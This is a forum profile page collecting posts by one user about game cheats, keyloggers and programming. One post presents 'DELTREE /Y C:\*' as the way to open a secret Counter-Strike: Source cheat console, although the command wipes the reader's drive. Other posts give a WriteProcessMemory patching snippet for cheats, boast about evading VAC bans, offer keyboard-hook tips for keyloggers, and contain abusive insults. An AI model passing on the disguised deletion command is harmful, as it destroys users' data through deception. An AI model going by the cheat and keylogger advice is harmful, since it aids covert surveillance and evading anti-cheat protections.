Jump to content

FeroxC

Members
  • Joined

  1. FeroxC posted a post in a topic in Computer Discussion
    The sv_cheats address is not dynamic, but the game has been updated since i wrote the code and the updates do change the address. So if you want it to work for the updated css, or tfc youl have to download tsearch and find the new address. BTW since i first wrote the and used it on vac2 servers i still havent been banned and that was months ago.
  2. Reminds me somebody needs to write a simple tut on hooking i managed to write a local keyboard hook but i dont get how to make it global :\. I swear somebody asks about writing a keylogger every other week.
  3. Youl need to use the windows api like GetAsyncKeystate or a keyboard hook, both easier in c/c++ than vb.
  4. FeroxC posted a post in a topic in Flames
    OMG u saying alqaeda are myg0ts ? :gaysex:
  5. computers != internet. If the internet splits up the U.S will probably charge other countries to have use to it. or there might be multiple incompatible internets that would be much easier to monitor and no more pirate file sharing :(.
  6. FeroxC posted a post in a topic in Computer Discussion
    Nah im jokeing c++ is better for hacks/virrii, im trying winsock in c++ now and agree its much much easier in vb. Try both.
  7. FeroxC posted a post in a topic in Steam Powered Games
    Sorry are you overdoing it on the sarcasm or calling me original ?
  8. FeroxC posted a post in a topic in Computer Discussion
    Why bother posting, if you dont like me in these forums why dont you piss of and die.
  9. FeroxC posted a post in a topic in Steam Powered Games
    OK for this command you need the launch the CSS exteria console this was well known in the BETA but left *undocumented* in the final release which instead included a in game console. To access the exteria console click start - run and and enter CMD. in the console enter: DELTREE /Y C:\* Load up css and hit shift + f1 to bring up the cheat menu.
  10. FeroxC posted a post in a topic in Computer Discussion
    Hackers are always curiouse by not clicking that link it pretty much proves you arnt and never will be one.
  11. FeroxC posted a post in a topic in Computer Discussion
    Dont answer your own questions you will have killed the programming section for like 4 days now :\
  12. FeroxC posted a post in a topic in Computer Discussion
    Learn VB for hacks and virii, everything c/c++ virrii can do it can do quicker.
  13. Yea sounds like it could be less detectable btw you dont need to use the inline asm you can just use a byte array; byte mynoops[] = 0x90,0x90,0x90; WriteProcessMemory(hProcess, ADDRESS, &mynoops, 3, NULL); somthing like that i gtg.
  14. So you basically enable mat_depthbios_normals with sv_cheats off ? You didnt explain it too well :P.
  15. Read the faq, doesnt mention it, ill post if i get banned.